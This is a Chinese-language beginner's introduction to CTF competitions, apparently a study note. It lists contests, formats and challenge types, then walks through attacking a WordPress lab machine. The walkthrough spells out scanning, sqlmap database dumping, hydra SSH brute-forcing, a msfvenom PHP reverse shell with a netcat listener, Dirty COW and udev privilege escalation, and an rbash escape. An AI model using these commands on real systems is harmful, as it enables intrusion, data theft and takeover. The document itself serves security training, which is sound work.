什么是CTF
本文是对入门学习的一些概念了解和一些常规场景记录
1.CTF(capture the flag)是夺旗赛的意思。
是网络安全技术人员之间进行攻防的比赛。
起源1996年DEFCON全球黑客大会,替代之前真实攻击的技术比拼。
(DEFCON极客大会诞生1993,每年7月在拉斯维加斯举行)
有黑客比赛的世界杯的说法。
CTF竞赛已成为安全圈最流行竞赛模式。
国际知名赛事
DEFCON CTF:CTF赛事中的“世界杯”
UCSB iCTF:来自UCSB的面向世界高校的CTF
Plaid CTF:包揽多项赛事冠军的CMU的PPP团队举办的在线解题赛
Boston Key Party:近年来崛起的在线解题赛
Codegate CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元
Secuinside CTF:韩国首尔“大奖赛”,冠军奖金3000万韩元
XXC3 CTF:欧洲历史最悠久CCC黑客大会举办的CTF
国内知名赛事
XCTF联赛:是国内最权威、最高技术水平与最大影响力的网络安全CTF赛事平台。
(国内,亚洲最大竞赛。清华蓝莲花战队发起) 强网杯:国家级安全比赛,网信办网络安全协调局指导。 红帽杯:广东公安厅,计算机网络安全协会举办 AliCTF:阿里 TCTF:腾讯 BCTF:百度 WCTF:世界大赛邀请制,360 HCTF:杭州电子科技大学信息安全协会 ISCC:全国大学生,北理工
2.竞赛模式:
1.解题模式(jeopardy风险,危险)
通常是线上参与,网络安全技术的题目。
题目包含:逆向,漏洞挖掘和利用,web渗透,密码,取证,隐写,安全编程等类型。
2.攻防模式(attack&defense)
互相攻击防守,挖掘漏洞攻击和修复漏洞防守。
3.混杂模式(mix)
解题和攻防模式结合,典型赛事iCTF。
3.题目类型
3.1.reverse(逆向)
涉及逆向分析能力:软件逆向,破解技术,反汇编和反编译技术。
知识:汇编语言,加解密,反编译工具等。
3.2.Pwn(破解)
pwn发音砰,破解的意思,主要溢出漏洞(堆和栈溢出等)。 涉及对二进制漏洞挖掘和利用能力。 知识:c/c++,OD+IDA,数据结构,操作系统,汇编原理。 (CE(CheatEngine)用来定位数据,OD(ollydbg)用来动态调试,IDA(Interactive Disassembler)用来看代码)
3.3.web(web安全)
web站点漏洞挖掘和利用:XSS,文件包含,代码执行,上传漏洞,sql注入等。 以及数据包的构造和响应,tcp/ip协议。 知识:PHP,JSP, JAVA, Python,TCP/IP,SQL,OWASP TOP 10
3.4.crypto(加解密)
涉及密码学相关技术,加解密技术,编码解码技术。
知识:数论,矩阵,密码学。
3.5.misc(杂项)
安全相关:信息收集,隐写,流量分析,数字取证,编码转换。
知识:隐写术,wireshark流量分析审查等工具使用,编码。
3.6.mobile(移动)
涉及APP漏洞挖掘和利用:iPhone和Android系统,以Android的apk破解为主。
知识:Android
4.学习建议:
可以刷题或者靶机练习,以web安全作为学习入口是不错选择。
XCTF(攻防世界)
Bugku CTF
Jarvis OJ
ctf.show
BUUCTF
CTFHub
词汇简介:POC,EXP,CVE,CVSS
POC(Proof of Concept) 漏洞证明,漏洞报告中,通过一段描述或一个样例来证明漏洞确实存在 EXP(Exploit) 漏洞利用,某个漏洞存在EXP,意思就是该漏洞存在公开的利用方式(比如一个脚本) 0DAY 含义是刚刚被发现,还没有被公开的漏洞,也没有相应的补丁程序,威胁极大。 CVE(Common Vulnerabilities & Exposures) 公共漏洞和暴露,信息安全漏洞公共的名称。 使用一个共同的名字,可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题 。
5.靶机实战:拿下wordpress提权
测试环境:
kali攻击机和WordPress系统的靶机。
WordPress是一款个人博客框架属于内容管理系统(CMS)使用PHP语言和mysql数据库架设。
攻击过程:
信息收集,漏洞挖掘,漏洞利用,权限提升。
5.1.信息收集
包括:主机,ip,端口,服务,操作系统,目录等扫描收集及社工。 1.主机发现工具:arp-scan netdiscover fping等。 arp-scan -l //局域网扫描 netdiscover -i eth0 -r 192.168.133.0/24 //网段扫描 通过mac地址得到厂商。 2.端口扫描工具:nmap -A:全面探测(aggressive(进攻性)) -sS:SYN扫描(半连接) -sV:显示版本 -v:显示vebose详细过程 -p-:全端口(1-65535) -T4:延迟级别,放弃超时10ms nmap -sS -sV -v -p- -T4 192.168.12.1 nmap -A ip nmap -A -sS -sV -v -p- -T4 192.168.12.1 常见端口和服务: 22:ssh 25:smtp 80:http 111:RPCINFO服务 443:HTTPS服务 624:PRC 3306:MYSQL 3.信息收集目标就是威胁建模 (简单来说就是猜测服务可能存在攻击方式和漏洞) 对于web服务主要收集:服务和系统的名称和版本。 可以利用谷歌浏览器Wappalyzer插件收集:系统和服务的版本信息 WordPress版本,操作系统,数据库类型,PHP版本 web地址的参数或者表单验证是否可sql注入,
一般首页是没有参数的,选择注册页或者可传参数的页面
比如xx?id=1 后面加个冒号:xxx?id=1' 后面加 and 1=1 后者and 1=2:id=1 and 1=1 或者id=1 and 1=2
and sleep(5)
根据响应页面的内容对比判断是否存在注入点。 一般使用工具sqlmap更方便 ssh尝试弱口令爆破 工具:九头蛇 美杜莎 4.目录扫描:dirb,dirbuster,gobuster,御剑等工具。nikto。 对于web目录扫描是关键步骤,甚至首步骤。 作用:敏感目录和敏感文件可能泄露(管理页面,遗留文件)。
发现管理后台,数据库管理页面。
5.2.漏洞挖掘
几种方式: 1.对于管理后台尝试: 弱口令(默认密码,常用密码), 暴力破解(工具:burp爆破,PHPmyadmin爆破)。 比如phpmyadmin(数据库网页管理工具的主页) 2.链接的参数注入 工具:sqlmap参数:-u:url --dbs:爆破数据库 -D:指定数据库 --tables:爆破数据表 -T:指定表 --columns:爆破字段 -C:指定字段(可多个) --dump :脱库 sql注入检测:sqlmap -u "http://xxx?id=1" 得到数据库,web服务器,操作系统类型和版本以及具体库 sql注入检测:sqlmap -u "http://xxx?id=1" --dbs 得到哪些库 sqlmap -u "xxx?id=1" --dbs -D xx --tables 得到爆破xx库的表 sqlmap -u "xxx?id=1" --dbs -D xx --tables -T xx --columns 得到爆破的字段 sqlmap -u "xxx?id=1" --dbs -D xx --tables -C xx,xx,xx --dump 得到爆破字段的内容 有时需要cookie(登陆后)才能sqlmap扫描参数: 获取cookie:浏览器开发者网络查看或者控制台(输入document.cookie获取) sqlmap -u "http://xxx?id=1" -p id --cookie="xxx=xxxxxxxx" --dbs 通过爆破可能得到账号和密码,如果服务支持ssh,可以尝试连接 >ssh xx用户@ipxxxx >密码xxx
(制作密码字典工具以及破解:crunch ;hydra 。
比如:crunch 8 8 -t admin%%@@ -o dic.txt //8 8:最小8位最大八位 -t:占位符 %数字 @小写字母 -o:输出文件 暴力破解ssh:
hydra -l guest -P dic.txt xx.xx.ip ssh
3.网页前端源码查看 是否只是前端验证。 4.nikto可对web服务器全面漏洞扫描:服务器cgi和项目及配置等 cgi通用网关接口:网页原本是静态的,通过cgi脚本进行处理生成页面返回给浏览器形成动态交互网页,类似servelet。 有时候指服务器,有时候 指cgi语言。 nikto -h http://xxx 得到一些敏感目录和文件,比如源码b备份,sql等 分析源码获得漏洞,获取管理员账号等
拿到网站管理员权限:密码破解获得数据库管理权限以及后台管理员
5.3.漏洞利用
1.利用MSF生成反弹shell(木马) msfvenom -p php/meterpreter/reverse_tcp LHOST=自己主机ip LPORT=4444 -o Desktop/shell.php 生成php网页木马,让目标连接自己主机 kali自带php马:/usr/share/webshells/php/php-reverse-sell.php 2.上传马 将马页面放到php执行目录,或者写入可执行某个页面。 3.监听原先木马设置端口以建立链接 几种方式: 1)netcat工具:类似工具:中国菜刀 nc -nlvp 4444 2)msf msf>use exploit/multi/handler >set playload php/meterpreter_reverse_tcp >set lhost ip >exploit 执行后会形成一个会话session,ctr+c可退出, 输入:session 1进入会话: meterpreter> linux查看监听:netstat -tunlp 4.得到shell 访问马页面,监听程序得到反弹shell. 此时这个shell是web服务器的权限也就是Apache服务器权限。 whoami ;查看当前权限 uname -a : 查看linux系统内核版本 如果使用msf监听那么执行exploit,连接建立后会得到shell meterpreter> 输入:sysinfo 查看系统版本信息, 输入:shell 生成交互shell 还可以切换不同样式的shell:交互更友好: python -c 'import pty;pty.spawn("/bin/bash")' (common shell和 meterpreter shell区分 有些连接得到是common shell 使用ctr+z 然后:y 让当前shell隐藏回到msf界面, 使用session -l :查看所有会话shell,每个会话有个id。 session -u 某id:将某会话从common变成meterpreter session -i 某id :进入某id会话 ) 5.权限提升,获取root权限 1).漏洞脏牛(dirty cow,CVE-2016-5195)对Linux内核>=2.6.22版本(2007年发布)本地提权,直到2016.10才修复。 原理:内核的内存子系统在处理写入复制时(copy-on-write)产生了竞争条件,利用执行顺序异常,对只读内存映射进行写入,获得root权限。 github官方提供exp 2).漏洞udev(cve2009-1185 linux2.6的一个提权漏洞) searchsploit linux udev (漏洞库搜索udev漏洞的exp) /usr/share/exploitdb/platforms/linux/local/8478.sh exp在靶机执行需要先获取执行文件,还的添加执行权限。 提供一个传送地址的几种方式: 1).sh放在/tmp下,并执行:python -m SimpleHTTPServer 80 目标主机获取:wget http://xx/xx.sh 查看进程:cat /proc/net/netlink 在特定进程执行udev 思路:知道漏洞,找到漏洞exp。
补充:低权限rbash提升(绕过)
当用guest用户登陆系统:ssh gust@xx.xx.xx.ip 得到的shell可能权限非常低很多命令不能使用 当前是rbash解析命令: echo $PATH:查看当前path。 输出:/home/guest/prog 输入命令会先到path目录下查找,存在才会直接执行,否则需要输入全路径才行执行。 echo $PATH/*:查看可以直接执行的命令 输出:/home/guest/prog/vi 即表面可以直接执行vi。 进入vi: :!/bin/bash //!在命令前面表示调用外部命令,在命令后面(wq!)表示强制执行。 执行后命令使用bash来解析。 (sudo以管理员运行,su切换用户,sudo su 切换到管理员) 执行sudo su 显示找不到命令sudo 某目录查找命令: ls -la /bin/sudo ls -la /sbin/sudo ls -la /usr/bin/sudo //确定sudo位置 修改环境变量: export PATH=$PATH:/usr/bin/sudo 查看当前path: echo $paht 查找将su命令路径添加到环境: ls -la /bin/su //确认位置 修改path: export PATH=$PATH:/bin/su 接下可以执行:sudo su(需要有密码)
5.4.如何防御:
1.关闭多余端口,最小原则。 2.使用cms等系统,修改默认后台路径。 3.数据管理PHPmyadmin修改默认路径和密码。 4.升级操作系统版本,及时打补丁修复漏洞。 5.关注最新漏洞情报,提升安全运维响应能力。